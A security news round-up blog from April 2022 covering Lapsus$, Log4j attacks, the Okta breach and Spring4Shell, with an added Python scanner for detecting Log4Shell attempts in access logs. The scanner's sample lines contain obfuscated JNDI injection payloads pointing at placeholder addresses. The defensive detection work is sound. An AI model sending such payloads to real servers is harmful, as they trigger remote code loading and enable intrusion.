Cyber Round-up for 1st April
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week to cover some of the news, posts, views, and highlights from the world of Security.
In this week’s round-up:
The Lapsus$ data extortion group announced this week that they were “officially back from a vacation” and didn’t waste any time in posting 70GB of data stolen from the software development firm Globant. Among the exfiltrated data were images of customer admin credentials, as well as Globant’s source code. Last week, during the group’s “vacation”, City of London Police arrested seven individuals believed to be associated with Lapsus$. We expect a lot more activity in the coming weeks and will continue to update you as we learn more.
It has been four months since the Log4j vulnerabilities were disclosed, but that does not mean attacks have slowed down. VMware Horizon servers have been a major target for attackers looking to exploit Log4j, and researchers believe that “the current wave of attacks against VMware Horizon are a precursor to ransomware attacks”. VMware released an updated version of Horizon back in December 2021 which addresses the Log4j vulnerabilities being exploited here; anyone still running an unpatched server should upgrade to the latest version as soon as possible.
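As an added example, not code from the Ironshare round-up or from VMware, here is a small Python log scanner of the kind a defender might run over Horizon or reverse-proxy access logs while waiting for a patch window. Log4Shell exploitation attempts carry a `${jndi:<scheme>://...}` lookup string in some logged field (commonly the User-Agent or a query parameter), and real-world payloads hide the word `jndi` behind nested lookups such as `${lower:j}` and `${::-j}` or behind percent-encoding. The scanner normalises each line (percent-decoding and collapsing those obfuscating lookups) before matching. The log lines below are constructed samples using RFC 5737 documentation addresses, not real traffic; the combined-log field layout and the set of obfuscations handled are assumptions, and anything the scanner flags still needs to be confirmed against the application’s own logs.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Line 1 is benign; the
# rest carry a JNDI lookup in plain, nested-lookup or percent-encoded form.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [01/Apr/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Apr/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '198.51.100.4 - - [01/Apr/2022:10:02:11 +0000] "GET /portal/?q=${${lower:j}ndi:rmi://192.0.2.11:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '198.51.100.7 - - [01/Apr/2022:10:02:30 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://192.0.2.12/z}"',
    '203.0.113.20 - - [01/Apr/2022:10:03:00 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.13%2Fq%7D HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# A lookup with no further lookup nested inside it, e.g. ${lower:j}.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The thing we are actually hunting for, once obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)
# Lookups that merely transform their argument; attackers nest these to hide "jndi".
_TRANSFORM_PREFIXES = ("lower:", "upper:")


def _resolve(match):
    """Collapse one innermost lookup; leave anything we don't understand untouched."""
    body = match.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> default value "j"
        return body.split(":-", 1)[1]
    lowered = body.lower()
    for prefix in _TRANSFORM_PREFIXES:    # ${lower:J} / ${upper:j} -> "J" / "j"
        if lowered.startswith(prefix):
            return body[len(prefix):]
    return match.group(0)                 # e.g. ${jndi:...} itself is kept as-is


def normalize(text, max_rounds=20):
    """Percent-decode (handles double encoding) and collapse obfuscating lookups
    until the string stops changing, bounded to avoid pathological input."""
    prev = None
    rounds = 0
    while text != prev and rounds < max_rounds:
        prev = text
        text = unquote(text)
        text = _INNERMOST.sub(_resolve, text)
        rounds += 1
    return text


def scan_log_lines(lines):
    """Return one finding per line that carries a JNDI lookup after normalization."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        normalized = normalize(line)
        m = _JNDI.search(normalized)
        if not m:
            continue
        end = normalized.find("}", m.end())
        payload = normalized[m.start():] if end == -1 else normalized[m.start():end + 1]
        findings.append({
            "line": lineno,
            "client": line.split(" ", 1)[0],   # first field of the combined log format
            "scheme": m.group(1).lower(),      # ldap, rmi, dns, ... (useful for triage)
            "payload": payload,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['client']} sent {f['scheme']} lookup {f['payload']}")
```

The `scheme` field is worth keeping in alerts: `ldap` and `rmi` lookups are the ones that can pull in a remote class, while `dns` lookups are usually reconnaissance checking whether a host is vulnerable at all.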
In last week’s blog we reported on the disclosure of a cyber-attack on Okta. Aside from the fact that the incident happened two months before it was publicly disclosed, most information was withheld at the time. A report released on 22nd March by Sitel, which supplied Okta with contract workers for its customer support, found that a support engineer’s laptop had been compromised by a Lapsus$ member, and that this access was used to view Okta customer data. Okta has noted that its support engineers are only given access to the data their role requires; they cannot create or delete users, download customer databases or access Okta’s source code repositories. Okta has since determined that up to 366 of its customers were affected by the breach in some capacity, and says it will continue to strengthen its security.
Data collected by the Department for Digital, Culture, Media & Sport (DCMS) shows that almost a third of businesses in the UK are experiencing cyber attacks on a weekly basis. In light of this, the NCSC is encouraging organisations to improve their security, pointing SMBs to the Cyber Essentials scheme and larger organisations to its Board Toolkit. Alongside the rise in attacks on UK organisations, 82% of UK senior managers now rate cyber security as a “fairly high” or higher business priority, up 5 percentage points on last year.
An alert from the UK Government has advised organisations to avoid, and where possible replace, Russian-owned products and services. With the UK backing Ukraine in its defence against Russia, it is not unrealistic to expect that Russia could leverage its products and services to retaliate against the UK. Products like Kaspersky AV, and other cloud-enabled products whose supply chain includes Russia, have come under scrutiny because Russian companies have a legal obligation to assist the Russian Federal Security Service (FSB). This could compromise the confidentiality, integrity and availability of data held by UK businesses that use those products.
Both Microsoft and Google have announced acquisitions intended to improve cloud security for their users. Google is in the process of acquiring Mandiant, a cyber security company offering threat intelligence services, with more than 600 consultants responding to thousands of security breaches every year. Research from Mandiant’s intelligence analysts feeds back into its products to help organisations defend against new threats. Microsoft has recently acquired two cyber security companies: CloudKnox Security, a provider of cloud infrastructure entitlement management, and RiskIQ, a threat intelligence and attack surface management service. These acquisitions aim to increase the security of the cloud services that both Google and Microsoft provide.
Vulnerabilities & Updates
A new zero-day vulnerability has been discovered in the Spring Core Java framework which could allow remote attackers to execute arbitrary code on affected applications. The zero-day, dubbed ‘Spring4Shell’, is reportedly caused by “unsafe deserialization of passed arguments” and can only be exploited under a fairly specific deployment configuration.
More details on this vulnerability can be found here, along with details on the configuration requirements for the exploit.
A proof-of-concept was recently released for a vulnerability affecting the remote keyless entry system in Honda Civics. The flaw only affects Civics made between 2016 and 2020, and could allow an attacker to lock, unlock and start the vehicle. Despite the proof-of-concept being public, Honda has announced that it has no intention of updating the older vehicles affected.
A detailed breakdown of this vulnerability can be found here on GitHub.
And that’s it for this week’s round-up, please do check in next week for our new batch of security news and posts.
Stay Safe, Secure and Healthy!
Edition #184 – 1st April 2022
Why not follow us on social media:
Ironshare – Security Simplified